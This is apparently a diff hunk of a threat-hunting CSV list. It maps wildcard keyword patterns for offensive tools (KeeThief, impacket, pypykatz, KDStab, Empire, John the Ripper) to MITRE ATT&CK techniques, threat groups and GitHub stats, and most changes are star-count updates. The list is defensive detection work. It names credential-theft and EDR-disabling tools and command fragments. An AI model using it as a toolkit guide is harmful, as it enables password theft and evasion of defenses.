or if Tor has been configured correctly checking service and network settings.","T1090 - T1132 - T1046 - T1016","TA0003 - TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/brainfucksec/kalitorify","1","0","N/A","N/A","9","897","214","2022-05-31T08:47:52Z","2016-02-03T20:42:46Z" +"*kalitorify*","offensive_tool_keyword","kalitorify","kalitorify is a shell script for Kali Linux which use iptables settings to create a Transparent Proxy through the Tor Network. the program also allows you to perform various checks like checking the Tor Exit Node (i.e. your public IP when you are under Tor proxy). or if Tor has been configured correctly checking service and network settings.","T1090 - T1132 - T1046 - T1016","TA0003 - TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/brainfucksec/kalitorify","1","0","N/A","N/A","9","898","214","2022-05-31T08:47:52Z","2016-02-03T20:42:46Z" "*kaluche/bloodhound-quickwin*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" "*kancotdiq/wpaf*","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Web Attacks","https://github.com/kancotdiq/wpaf","1","0","N/A","N/A","1","51","8","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z" "*karendm/ADHunt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" -"*Karmaleon.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - 
T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*karmaSMB.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Karmaleon.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*karmaSMB.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*katoolin*toollist.py*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*katoolin3.py*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*KatzSystemArchitecture*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*KBDPAYLOAD.dll*","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","156","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" "*KcpPassword.cs*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*kdcdump2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*kdcdump2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*kdstab * /CHECK*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /CLOSE*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*kdstab * /DRIVER*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" 
@@ -12648,91 +12804,91 @@ "*kdstab.cna*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*KeeFarceReborn.*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","","","" "*KeePass.sln*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" 
-"*keepass_common_plug.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*keepass_discover.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*keepass2john *.kdbx*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*KeePassBackdoor.*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" -"*KeePassConfig.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1071","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*keepass_common_plug.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*keepass_discover.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*keepass2john *.kdbx*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password 
cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*KeePassBackdoor.*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*KeePassConfig.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1071","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*KeePassConfig.ps1*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*-KeePassConfigTrigger*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard 
Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-KeePassConfigTrigger*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*keepass-password-dumper*","offensive_tool_keyword","keepass-password-dumper","KeePass Master Password Dumper is a simple proof-of-concept tool used to dump the master password from 
KeePass's memory. Apart from the first password character it is mostly able to recover the password in plaintext. No code execution on the target system is required. just a memory dump","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/vdohney/keepass-password-dumper","1","1","N/A","N/A","6","567","47","2023-08-17T19:26:55Z","2023-05-01T17:08:55Z" "*KeePwn plugin add -u * -p * -d * -t *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*KeePwn plugin check -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*KeeTheft/Dinvoke*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10","","N/A","","","" "*KeeThief*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*KeeThief.*","offensive_tool_keyword","empire","Empire 
scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*KeeThief.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*KeeThief.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 